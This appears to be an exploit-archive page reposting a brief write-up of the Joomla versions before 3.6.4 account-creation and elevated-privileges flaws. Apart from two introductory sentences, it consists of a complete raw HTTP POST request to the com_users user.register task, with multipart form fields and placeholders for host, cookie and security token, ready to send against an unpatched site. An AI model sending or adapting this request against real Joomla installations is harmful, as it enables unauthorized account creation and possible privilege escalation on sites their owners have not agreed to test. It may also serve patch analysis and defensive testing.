Home / os / win10

Joomla < 3.6.4 Account Creation/Elevated Privileges write-up and exploit

Posted on 30 November -0001

<HTML><HEAD><TITLE>Joomla (< 3.6.4) Account Creation/Elevated Privileges write-up and exploit</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>Yesterday Joomla published version 3.6.4, an update to patch security issues:

- High Priority — Core — Account Creation (affecting Joomla! 3.4.4 through 3.6.3) More information 
- High Priority — Core — Elevated Privileges (affecting Joomla! 3.4.4 through 3.6.3) More information 
Because I was curious to see how these vulnerabilies worked I decided to check out the patch and write an exploit. By looking at the changes, the issue had to be in the components/com_users/controllers/user.php file.

EXPLOIT
=========================================================
POST /index.php?option=com_users&task=user.register HTTP/1.1
Host: [INSERT_HOST]
Referer: [INSERT_HOST]/index.php/component/users/?view=registration
Cookie: [INSERT_COOKIE]
Connection: close

------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[name]"

hackers
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[username]"

hackers
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[password1]"

password
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[password2]"

password
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[email1]"

email@example.com
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[email2]"

email@example.com
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="option"

com_users
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="task"

user.register
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="[INSERT_SECURITY_TOKEN]"

1
------WebKitFormBoundarydPTNyMPMzmAhBsf4--
=========================================================

</BODY></HTML>

 

TOP

Malware :

Exploits :